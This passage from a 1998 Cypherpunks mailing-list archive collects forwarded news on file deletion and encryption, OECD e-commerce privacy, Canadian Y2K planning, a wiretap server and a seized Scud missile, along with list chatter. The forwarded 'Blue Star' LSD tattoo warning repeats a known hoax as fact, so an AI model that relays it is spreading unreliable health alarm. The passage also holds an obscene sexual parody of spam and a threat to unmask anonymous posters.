reside on a computer, and on a computer network, long after the user
deletes them. The files are forgotten, but not gone.

Deleting a file does not really delete the file. It merely hides it from
view so it no longer shows up in a directory of files. It's like getting an
unlisted telephone number. The listing may not appear in the phone
directory, but the phone can still ring if someone knows the right number.

When a user deletes a file, the computer stops listing it in the file
directory and marks the disk space as available for reuse. Another file may
eventually be written atop the same space, obliterating any traces of the
original. But as hard disk capacities swell into the gigabytes, the space
may not be overwritten for a long, long time.

In that limbo period when the deleted file is undead, any moderately
skilled computer user can locate, restore and read the deleted file by
using such commands as "undelete" or "unerase," which are common features
of many software utilities.

The computer's ability to remember deleted files is most often a good
thing, especially when important files have been deleted by accident. Every
day, computer technicians get frantic calls from people who have
inadvertently erased the boss's speech or the big presentation due the next
morning, or who have children who have erased those boring Quicken folders
to make room on the disk for games.

At those moments, being able to resurrect the files from the dead seems
like a miracle.

There are a number of utility programs available that have an "unerase"
capability, to be used both in emergencies and as a precaution against
accidents. Examples include Norton Utilities from the Symantec Corporation.

But as with most tools, "unerase" programs can be dangerous in the wrong
hands.

To truly erase a file and prevent it from being recovered, one must write
over it, or wipe it.

There are several utility programs available that enable the user to
overwrite a single file or the entire disk, or anything in between. Such
programs typically have apocalyptic names, such as Shredder, Flame File and
Burn. Similar disk-wiping tools are often included in PC utility programs
and encryption programs, but others are available for downloading without
charge from the Internet.

These programs typically hash over the designated disk space with
meaningless patterns of ones and zeroes, instead of the meaningful patterns
of ones and zeroes that represent the original information. That process
renders the deleted file unreadable in most cases.

The key phrase is "in most cases." Just as with encryption, there are
people working just as hard to recover wiped files as there are people
working to wipe them. Law-enforcement agencies and spies have developed
ways to reverse a simple, one-pass wipe with ones and zeroes and retrieve
the original file. So the Federal Government requires that sensitive files
be wiped many times with random characters, which, in theory, obliterates
the original file and makes it unrecoverable.

Unless, of course, the file has already been copied onto backup tapes. In
the digital world, the original file may be shredded, while one or more
perfect copies can exist elsewhere.

An even more bulletproof way to render files unreadable is to encrypt them.

Encryption scrambles a disk or file, including pictures (or a telephone
conversation, or a credit card sent over the Internet) so it can be opened
and read only by the person holding the proper key, or password. The
strength of the encryption is often measured by the length of the key,
which is in turn measured in bits. In general, each additional bit of key
length doubles the amount of effort needed for unauthorized users to break
the key.

Even weak encryption (with a 40-bit key length, for example) is sufficient
to deter most casual snoops. Breaking a 56-bit key requires computing
resources that are beyond the reach of all but the most determined code
breakers, and even then it can require days of sustained attacks by a
supercomputer just to crack one e-mail message. (The Government's National
Security Agency, by far the most formidable group of code breakers on the
planet, is thought to be able to break 56-bit keys in a much shorter time,
said Enrique Salem, a chief technology officer at Symantec, whose products
include Disk Lock, Norton Your Eyes Only, and Norton Secret Stuff.

Some encryption programs available today use 128-bit keys, which are
"infinitely unbreakable, at least in our lifetimes, even taking into
consideration the predictable advances in computing power," said Schnell of
RSA. In other words, it is more secure than the strongest physical vault
ever built. Not even the National Security Agency is believed to have the
ability to break a 128-bit key.

And then there is e-mail. People type all sorts of embarrassing,
confidential or intemperate words in e-mail in the mistaken belief that
such messages are private. In reality, messages sent by e-mail are less
secure than messages scribbled on a postcard.

The way the Internet mail system works, an e-mail message passes through
several exchange points, or nodes, on its way to the recipient's computer.
The system administrator at each handoff point can in theory read the
message, copy it, reroute it or tamper with it. If the message originates
or terminates in a corporate computer system, chances are high that a copy
will persist in the company's backup tapes or disk for days, at least.

In the end, there are only two ways to keep information confidential in the
digital age. One is to use strong encryption. The other is never to write
it down or speak it in the first place.


PRIVACY PROTECTION:

Who knows what secrets lurk on your hard drive? With luck, and with the
following security programs, only you do.

PGP 6.0
(Windows 95, 98 and NT, and Macintosh OS 7.5.3 and newer; free for
individual, noncommercial use) Philip R. Zimmermann's Pretty Good Privacy,
or PGP, is one of the world's most widely used encryption programs for
personal computers, so good, in fact, that the United States Government
contends that it is as potent a military weapon as a jet fighter or a
cruise missile.

NORTON YOUR EYES ONLY 4.1
(Windows 95, 98 and NT; about $75; (800) 441-7234.) Norton Your Eyes Only
performs a variety of password-protected security functions. It can be set
to blank the screen and lock the computer if the user steps away for a
minute or to prevent unauthorized users from booting the machine.

RSA SECURPC
(Windows 95, 98 and NT; $59; Security Dynamics Technologies; (800)
732-8743.)
Intended more for small office use, SecurPC links with the Windows Explorer
file management system to automatically and transparently lock disks and
files with 128-bit encryption, but it allows the keys to be shared with
administrators.

COOKIE CRUSHER
(Windows 95, 98 and NT; $15 shareware; www.zdnet.com/swlib,
www.shareware.com, etc.) Cookies are small files that a Web site installs
on your hard drive. The cookie can contain technical and personal
information, including a history of the Web pages you have visited. These
utilities enable the user to accept or reject cookies.

BCWIPE WINDOWS
(Windows 95, 98 and NT; $15 shareware; www. download.com,
www.zdnet.com/swlib and others.)    For those who prefer not to use an
encryption package, BCWipe provides military-grade file and disk wiping to
make sure that deleted files are really erased.

Copyright 1998 The New York Times Company

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.










**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 10 Oct 1998 09:35:48 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Privacy, Other Issues Post Difficulty for E-Commerce Meeting
Message-ID: <199810100115.SAA09659@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Privacy, Other Issues Post Difficulty for E-Commerce Meeting
Date: Fri, 09 Oct 1998 09:38:25 -0500
To: believer@telepath.com

Source:  USIA
http://www.usia.gov/current/news/latest/98100807.clt.html?/products/washfile
/newsitem.shtml

08 October 1998 

PRIVACY, OTHER ISSUES POSE DIFFICULTY FOR E-COMMERCE
MEETING 

(U.S. position outlined at OECD conference in Ottawa)  (840)
By Bruce Odessey
USIA Staff Correspondent

Ottawa -- As ministers from industrialized countries met to work out
ways for promoting electronic commerce, differences persisted on a
number of issues, especially privacy.

When the Organization for Economic Cooperation and Development (OECD)
Ministerial Conference in Ottawa ends October 9, either the ministers
will produce a communique demonstrating some sort of agreement or the
Canadian minister presiding will produce a communique demonstrating
continued disagreement.

In an October 8 address to the conference, U.S. Secretary of Commerce
William Daley called privacy "the make-or-break issue for all of
electronic commerce." At issue are the potential for abuse of credit
card numbers and confidential medical and other private information by
unscrupulous businesses.

Daley was confident that the privacy and other consumer protection
issues would be resolved.

In a panel session, President Clinton's adviser Ira Magaziner
described the U.S. vision for protecting consumer privacy on the
Internet, a vision reliant on industry self-regulation, not government
regulation.

In each country, he said, some independent private sector organization
would develop a privacy code of conduct and authorize a graphic seal
of approval for web sites that pledge to follow that code. The
participating web site would have to notify potential buyers about
what information it would collect about the buyer and how it would use
it. The buyer would have the choice not to make a purchase under those
conditions.

In addition, Magaziner said, consumers would have the ability to
settle complaints about privacy abuse through the organization, which
would also conduct routine audits to assure compliance by its web site
participants.

Already 70 percent of relevant U.S. businesses conducting electronic
commerce have agreed to participate in this program once it becomes
established in the next few months, he said.

Magaziner compared the U.S. approach with the European Union (EU)
approach, which establishes government privacy regulation from the
beginning. In fact, a EU privacy directive scheduled to enter into
force in two weeks, prohibiting flows of electronic data about EU
nationals to countries that have no similar regulation, threatens some
disruption of data flows to U.S. companies. Secretary Daley said he
remains hopeful the two sides will avert any disruption.

"To be frank, we must succeed or millions of transactions between the
United States and Europe may be blocked," he said.

Magaziner argued that the U.S. vision of an alliance of independent
organizations for protecting consumer privacy operating in different
countries would achieve the flexibility required for the rapidly
evolving business of electronic commerce in a way that governments
could not.

"None of us know where this is headed," he said. "We have to be very
cautious before we act" to impose government regulation that could
stifle the expansion of this new technology soon after its birth.

The OECD secretariat draft proposal on privacy recognizes the
different approaches to privacy and other consumer protection issues
-- government regulation and industry self-regulation -- and suggests
ways for both to exist. While some EU representatives grumbled that
the OECD draft pays too little heed to consumers, Secretary Daley was
pleased.

"I welcome this commitment to work together to find common ground on
this issue," Daley said. "We believe that our self-regulatory approach
can co-exist with approaches taken by other governments.

"To be honest, it won't be easy," he said. "But with careful thought
and hard work, we can get the job done."

Privacy is but one in a set of issues concerned about building
consumer trust in electronic commerce. Conference participants
acknowledged that the level of trust remains low for most consumers,
who hesitate to commit their credit card numbers to cyberspace.

One of those issues concerns authentication of information exchanged
by parties to an e-commerce deal; another concerns enforcement of
contracts; another concerns the use of encryption for authentication
and privacy. No one expects final answers to emerge at Ottawa.

Another area of controversy the ministers are tackling concerns
taxation of e-commerce transactions. At an October 8 panel, U.S.
Internal Revenue Service Commissioner Charles Rossotti said a
discussion the day earlier among government and business participants
pointed to some consensus emerging at least about broad principles.

First, he said, there was consensus that definition was needed about
where products delivered by the Internet are consumed, especially for
intangible products like services.

Second, he said, participants wanted to promote the availability of
electronic taxpayer services, including electronic tax filing and
provision of tax information and guidance on the Internet.

Third, he said, taxes should be collected in a way that does not
disadvantage those who comply and tax authorities should aim to
prevent cheating by electronic means.

Fourth, he said, existing international tax rules should be clarified
for their application to electronic commerce, especially potential
problems caused by the location of information servers.
----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 10 Oct 1998 09:35:32 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Canadian Military Ready for Y2K Meltdown
Message-ID: <199810100115.SAA09687@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Canadian Military Ready for Y2K Meltdown
Date: Fri, 09 Oct 1998 10:18:46 -0500
To: believer@telepath.com

Source:  NOW On Communications
http://www.now.com/issues/current/News/tech.html

Militia readies for millennium meltdown 
2000 cyberglitch the major concern for Canadian forces 

By PATRICK CAIN 

Preparing for a civil emergency resulting from mass computer collapse on
January 1, 2000, has become the first priority of the Canadian military, a
general told a group of Toronto-area reservists in Meaford Sunday. 

That means the military is taking the millennium bug so seriously that its
worst-case plan, Operation Abacus, is a higher priority than Canada's part
in the NATO force in Bosnia-Herzegovina, where 1,319 Canadian soldiers (at
the moment, most from Ontario) are helping enforce the Dayton Accord. 

"Some people argue that it is the first priority amongst many priorities,"
brigadier general Walt Holmes, who commands ground forces in Ontario, tells
NOW Monday.  

"Our operational commitments in Bosnia will carry on, and so our soldiers
who are either deployed to or preparing for those operations will be given
the same support. 

"One can never anticipate what else may happen in the world to cause us to
have to deploy soldiers, so the bottom line is, if nothing else from a
contingency-planning point of view (emerges) it's the top priority with the
Canadian Forces." 

The problem, often referred to as Y2K, stems from the way computers express
the year portion of a numerical date, like 12/31/99. 

When the code that forms the foundation of modern computer software was
being written in the 50s and 60s, programmers decided not to use
then-precious computer space for the first two digits of the year. 

Because computers working on these assumptions aren't aware of centuries or
millennia, they will decide that January 1, 2000, is actually January 1,
1900. Because this disrupts the computer's sense of chronological sequence,
it can cause chaos and system breakdown.  

Since computer systems with six-digit dates control everything from
electricity systems to emergency dispatch systems to air traffic control,
companies, utilities and governments are pouring money and time into
finding and
fixing the bug. 

Too vast 

But because this involves scanning miles upon miles of computer code, some
argue that the task is simply too vast and intricate to be accomplished. 

Rotting food, cranky nuclear reactors, banking systems run amok -- a few
hours in the world of Y2K prophecy is enough to make you think a bunker in
Algoma full of canned beans might be the best idea after all. 

Most things we depend on depend on a computer chip somewhere, and that
includes deep freezes, nuclear reactors, food distribution systems, banking
systems, phone switching systems, wage and pension cheques, taxes, and
building management systems without which high-rise office buildings -- and
therefore Bay Street -- can't function.  

"I can't make you feel 100 per cent confident that everything is going to
function on January 1 of the year 2000," Ted Clark, the vice-president of
Ontario Hydro's Y2K project, told an alarmed parliamentary committee in April.
Hydro says it has 600 people working on the problem. 

But we don't need to wait for the end of the millennium to watch the
problem unfold -- Y2K glitches are already happening. Earlier this year,
the New York State liquor licence system crashed spectacularly when
officials tried to enter a licence that would expire in 2000. More
recently, the systems of several hospitals in Pennsylvania crashed when
staff tried to enter a medical appointment in 2000.  

At a conference in Ottawa last week, Toronto-based senior army officers
argued for a mobilization plan to deal with military involvement in a
possible crisis. 

Mobilization plan 

"The recommendation from us is that we would like to see some form of
commitment to ensuring that the reserves are able to respond," Holmes
observes.  

"We just said some sort of mobilization plan, to allow us to determine what
reserves we may get. (That would correspond to) Level Two mobilization." 

(In Canadian military doctrine, four stages of mobilization exist -- Stage
1 is the existence of the armed forces, Stage 2 is deployment of the armed
forces in its existing organization, Stage 3 is military expansion in an
emergency, and Stage 4 is national mobilization in war.)  

Among the options the military is considering is the stockpiling of food
and generators in armouries against a serious emergency.  

"As to where they're going to go, and what the end result will be, we don't
know yet," Holmes says. "It  depends on the perceived threat, as we get
closer to the date."  

Persistent rumours that Christmas leave in 1999 will be cancelled for
regular soldiers are premature, Holmes says. ("They'll probably wait until
everybody's made plans, and do it then," quips military critic Scott Taylor.) 

One important issue is what legal category military involvement in a crisis
would fall into. The armed forces recognize two types of domestic
operations -- unarmed assistance to civil authorities, which mostly
involves coping with natural disasters like the February ice storm or the
Manitoba flood, and "aid to the civil power," which
implies the potential use of force. Oka and the imposition of the War
Measures Act in 1970 would fall into this latter category. 

 Humanitarian  relief 

"The emphasis would be on domestic operations and humanitarian relief, if
required," Holmes says. "We are the force of last resort, and if something
happens, we are there to be called upon, but the focus is clearly on
domestic (humanitarian) operations." 

Toronto-area army reservists in Meaford last weekend were told that
riot-control training, which the militia in Toronto last underwent on a
large scale in the late 80s and early 90s in the aftermath of the Oka
crisis, is not on the agenda for now. 

 NOW OCTOBER 8-14, 1998 

 (c) 1998 NOW Communications Inc.
 NOW and NOW Magazine and the
 NOW design are protected through
trademark registration. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Sat, 10 Oct 1998 11:22:41 +0800
To: <cypherpunks@Algebra.COM>
Subject: [SF Bay Area] SCSI controller/PCI person?
Message-ID: <004c01bdf3f9$e8d01840$33248bd0@luckylaptop.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



If any of the Bay Area Cypherpunks here know of somebody or are themselves
knowledgeable in SCSI controller firmware or design, PCI boards, or fast
embedded systems crypto, please get in touch with me for a chat.

Thanks,
--Lucky Green <shamrock@netcom.com>
  PGP 5.x  encrypted email preferred




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 10 Oct 1998 12:00:22 +0800
To: cypherpunks@toad.com
Subject: EZ Wiretap Server
Message-ID: <199810100328.XAA21798@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to Sean Donelan, see a point and click
CALEA wiretap server:

   http://www.newnet.com/products/win/calea.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 10 Oct 1998 12:37:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EZ Wiretap Server
Message-ID: <199810100419.AAA20079@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: John Young <jya@pipeline.com>
   >
   >   Thanks to Sean Donelan, see a point and click
   >   CALEA wiretap server:
   >
   >      http://www.newnet.com/products/win/calea.html

That's disgusting.

   o Capacity for up to 512 simultaneous call content intercepts on a single call basis 
   o Capability to incorporate FBI "punchlist" items
   o Supports Lawfully Authorized Electronic Surveillance (LAES) delivery features 
   o Delivers intercepted call content and call identifying in formation simultaneously to
     five authorized law enforcement agency collection systems 
   o Supports three service categories: non-call associated, call associated and
     content surveillance 

If anyone can get a hold of functional characteristics manuals
for the product, lemme know, I'd like to have a copy.
---guy

   "Punchlist"? Keyword monitoring?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brook Powers <lwpowers@dis.org>
Date: Sat, 10 Oct 1998 13:35:23 +0800
To: William Knowles <aaa-list@access.org.uk>
Subject: Re: A Scud in California!
In-Reply-To: <Pine.BSI.3.95.981008202424.17213B-100000@kizmiaz.dis.org>
Message-ID: <199810100512.WAA11994@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



This sounds like it could be a dis.org project. Maybe Phon-e and HummerMan
are conspiring to rid us of Carolyn in a spectacular way next August.

Anyone know the range^h^h^h^h^h distance from Berkeley to New Mexico?

At 08:37 PM 10/8/98 -0700, William Knowles wrote:
>>From another one of the several lists I'm on, I figured someone
>might know who the new pseudo-proud owner of a fully-operational
>SS-1C Scud missle *WITH* moblie launcher is...
>
>Cheers!
>
>William Knowles
>erehwon@dis.org
>
>
> Intelligence, N. 86, 5 October 1998, p. 12
>
>
> USA
>
> THE SCUD THAT DIDN'T GET AWAY
>
> At "Intelligence", we're taking bets that you won't hear about
> the unidentified British firm which used an unnamed British
> freighter to import a fully-operational SS-1C Scud missile --
> complete with launcher, but missing its warhead -- into the
> United States.  According to a 25 September report in the
> "Washington Times", special investigators from HM Customs and
> Excise have been asked to determine how paperwork sent with the
> system came to be falsified, but they're probably going to run
> into ... the Pentagon because the Scud missile and its mobile
> transporter-erector launcher were seized on 2 September by the
> US Customs Service at Port Hueneme, California, about 56 km.
> north of Los Angeles and ... next door to the US Navy Point
> Mugu Pacific Missile Range, and ... the closest military port
> to the Vandenburg US Air Force Base where all classified US
> military launches take place.
>
> The Russian-designed, Czech-manufactured missile system was
> licensed for importation by the Bureau of Alcohol, Tobacco and
> Firearms (ATF), but ... it was wrongly described.  Although
> addressed to a wealthy -- but so far unnamed (and bets are he
> will never be named) -- US citizen, who is regarded as a bona
> fide weapons collector rather than an arms dealer, the missile
> system had not been made inoperable as required by import
> rules.  This is, of course, of interest to the Pentagon.  "This
> is a full-blown missile," stated John Hensley, a senior agent
> of US Customs Service in Los Angeles.  "The only thing missing
> is the warhead."  The launch chassis is a MAZ-543 truck,
> commonly used by former Soviet and Warsaw Pact forces.  "The
> guidance system was totally intact and the engine was ready to
> go," Mr. Hensley said.  "All you needed to do was strap on a
> garbage can full of C-4 high-explosive and you had a weapon."
> The guidance system and engine would, of course, be of intense
> interest to Pentagon intelligence, and the Israeli Mossad,
> particularly if the weapon is a later date or recent model.
>
> Hensley said the buyer, who lives in Palo Alto, had previously
> purchased a Scud missile that had been properly demilitarized.
> Under US law, such weapons may be imported, provided they are
> first cut up with a blowtorch so that they can never be
> reassembled.  But in this case, in an effort to fool customs
> officials, a photograph of the first -- cut up -- missile to be
> imported was attached to the illegal -- intact -- system, which
> was seized on 2 September.  If the "buyer" really wanted his
> missile, then the San Francisco Bay, which Palo Alto overlooks,
> is a much better port of entry.  Bets at "Intelligence" are
> also out on the "buyer" being associated with the military-
> funded Stanford Research Institute (SRI) or similar Pentagon-
> dependent firms in nearby Silicon Valley.
>
> COMMENT  --  The SS-1C Scud is a liquid-fueled missile which is
> among the most widely deployed weapons in the world.  It is in
> service in 16 nations.  Iraq's military forces were able to
> extend the range of the missile ("with baling wire and
> plywood", according to certain specialists), and used it
> extensively during the 1991 Gulf war.  International transfers
> of such missiles, which normally have a range of 300 km., are
> banned under the Missile Technology Control Regime.  Although
> the major media suggested the seizure would embarrass the
> Clinton administration, currently engaged in a major
> international diplomatic effort to halt exports of weapons of
> mass destruction and missile-delivery systems by Russia and
> China to the Middle East, it would seem more likely that the
> affair will "drag out indefinitely" in a California court,
> unless an appropriate "buyer" can be "sacrificed" publicly.
>
> ---------------------------------------------
>
> Olivier Schmidt,
> Editor of "Intelligence"
> <oschmidt@francenet.fr>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 10 Oct 1998 09:40:50 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <68a7d52256a663771ea3a03bfe2a04b3@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?

How much code have you ever written?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 10 Oct 1998 08:45:12 +0800
To: postmaster@request.net
Subject: Associate Program
Message-ID: <199810100015.CAA30363@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi, Michelle!

FuckFest is right around the corner! Pretty soon, you'll be orgasming! Are you looking for increasing your orgasmic potential this busy boinking season?

By spending only 3 months tied nude to a bed with your legs spread, you will start making risk-free incoming from your vagina. We will create an Associate Prostitution Package with a unique URL specifically so that burly old men can connect, give a credit card number, and tell Bruno and Bambi what to do to you. All you need to do is add links from your current website to your Porn page, and then receive a 20% commission on all sales generated through your site every month. It is absolutely FREE for you to become a porn star with this program.

Click http://www.fuckme.com/pornstar.html
to learn more about this orgasmic opportunity!

Thank you,

Spermy Cyberporno
Senior FuckFest Coordinator,
http://www.fuckme.com
===========================================================================
Click Here for Insider Tips and Secrets for Promoting your Labia Online
http://www.fuckme.com/tipsforlips.html
===========================================================================

P.S. If you would prefer not to receive future propositions from Fuckme.com, please reply with a nude picture of yourself, all attractive female family members, and all attractive female friends in suggestive poses pleasuring each other and you will be automatically removed from our mailing list.

Michelle spammed:

>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id OAA04166 for cypherpunks-unedited-outgoing; Fri, 9 Oct 1998 14:58:00 -0700 (PDT)
>Received: from eshu.request.net (eshu.request.net [207.48.132.2]) by toad.com (8.7.5/8.7.3) with ESMTP id OAA04161 for <cypherpunks-unedited@toad.com>; Fri, 9 Oct 1998 14:57:57 -0700 (PDT)
>Received: from munin.request.net ([208.236.140.172]) by eshu.request.net with ESMTP id <901-3202>; Fri, 9 Oct 1998 17:57:45 -0400
>Received: from mail.sprint.ca ([209.148.182.15]) by munin.request.net with SMTP id <114802774-28574>; Fri, 9 Oct 1998 17:57:36 -0400
>To: cypherpunks-unedited@toad.com
>From: associate@alpineforest.com
>Subject: Associate Program
>Organization: Alpineforest.com
>Message-Id: <76C492I2.19NC4W74@alpineforest.com>
>Date: 	Fri, 9 Oct 1998 17:57:31 -0400
>Sender: owner-cypherpunks@Algebra.COM
>Precedence: bulk
>X-Mailing-List: cypherpunks@algebra.com
>X-List-Admin: ichudov@algebra.com
>X-Loop: cypherpunks@algebra.com
>Status: RO
>X-Status: 
>
>
>
>Thanksgiving is right around the corner! Pretty soon, it'll be Christmas! Are you looking for increasing your income for this busy shopping season? 
>
>By spending only 3 minutes to sign-up for our Associate Program, you will start making risk-free income from your website. We will create an Associate Store page with a unique URL specifically for you. All you need to do is add links from your current website to your Store page, and then receive a 20% commission on all sales generated through your site every month. It is absolutely FREE for you to join this program. 
>
>Click http://www.alpineforest.com/associate.html
>to learn more about this exciting opportunity!
>
>Thank you,
>
>Michelle Schumer
>Associate Program Coordinator,
>http://www.alpineforest.com
>===========================================================================
>Click Here for Insider Tips and Secrets for Promoting your Business Online
>http://www.marketingtips.com/t.cgi/3582/
>===========================================================================
>
>
>P.S. If you would prefer not to receive future e-mail from Alpineforest.com, please reply with the subject "remove" and you will be automatically removed from our mailing list.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KCzzzzz@aol.com
Date: Sat, 10 Oct 1998 17:42:02 +0800
To: cypherpunks@toad.com
Subject: please include me
Message-ID: <9ab3eae1.361f267e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Lets do it all again.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KCzzzzz@aol.com
Date: Sat, 10 Oct 1998 17:42:56 +0800
To: cypherpunks@toad.com
Subject: ok
Message-ID: <88d2833a.361f26b9@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Sat, 10 Oct 1998 17:13:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?
Message-ID: <199810100855.FAA30538@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain




HyperReal-Anon wrote:
> 
> >HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?
> 
> How much code have you ever written?

Quite a bit actually. I recently upgraded to a dual pentium II 400 and
I wanted to take advantage of the 64 bit capability (2x32 = 64, right)
so I've just finished the first beta of the AOL 64 bit port.

The question of Tim May's contribution to cypherpunks keeps coming up.
I noticed from the comments that the original AOL8 code base was written
by Tim May.

I hope that clears that up.

-- an anonymous AOL64 beta user




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Sat, 10 Oct 1998 23:27:32 +0800
To: cypherpunks@toad.com
Subject: Here we go again...
Message-ID: <199810101455.LAA03704@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Fri, 09 Oct 1998 15:14:17 -0800
From: Greg Galbraith <GGALBRAI@jennycraig.com>
Subject: <ALERT> Just in time for Halloween

WARNING TO PARENTS:

A form of tattoo called "Blue Star" is being sold to school children.

It is a small piece of paper containing a blue star. They are the size of a
pencil eraser and each star contains traces of Lysergic Acid Deithylamide
(LSD).

The drug is absorbed through the skin simply by handling the paper. They
are also brightly colored paper tattoos resembling postage stamps that
have the pictures of the following on them:
              Superman       Mickey Mouse         Butterflies
              Clowns         Disney Characters    Bart Simpson

Each one is wrapped in foil.  This is a new way of selling LSD by appealing
to young children.  These are laced with drugs.  If your child gets any of
the above, do not handle them. These are known to react quickly and
some are laced with strychnine, which may cause irreversible brain damage in
some cases. The drug is addictive and, in the quantities contained in the
above items, can cause children to become additcts.

Please feel free to distribute this article within your community and work
place.


FROM:          J. O'Donnell, Danbury
          Hospital, Outpatient Chemical Dependency
          Treatment Service

----------------------------------------------------------------------------

Please copy and post!  Give to friends. Send copies to schools.
This is growing faster than we can train parents and professionals.


                                   Many Thanks,

                                         Val

Val G. Armstrong
Assistant to Director
Rehabilitation Administration Program
University of San Francisco
PH: (415) 422-2532
Fax:(415) 422-2551
Internet: armstrongv@usfca.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 10 Oct 1998 18:58:20 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
In-Reply-To: <199810100855.FAA30538@privacy.nb.ca>
Message-ID: <199810101045.MAA21635@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




> HyperReal-Anon wrote:
> > 
> > >HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?

I suppose the cyphernomicon doesn't count as furthering the cause to
you?

Anon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Sun, 11 Oct 1998 05:16:00 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE:
In-Reply-To: <cb4338e515c87edd@hr13.zedz.net>
Message-ID: <000001bdf490$59035320$8d2580d0@xasper8d>
MIME-Version: 1.0
Content-Type: text/plain



I know who anonymous is...  didn't you write "Primary Colors?"  <g>

~> -----Original Message-----
~> PS. there is someone on this list who knows who
~> i am. yes there is someone who knows who anon
~> posters are. we fucking hate you and am waiting 
~> for you to take the trap and we will reveal your
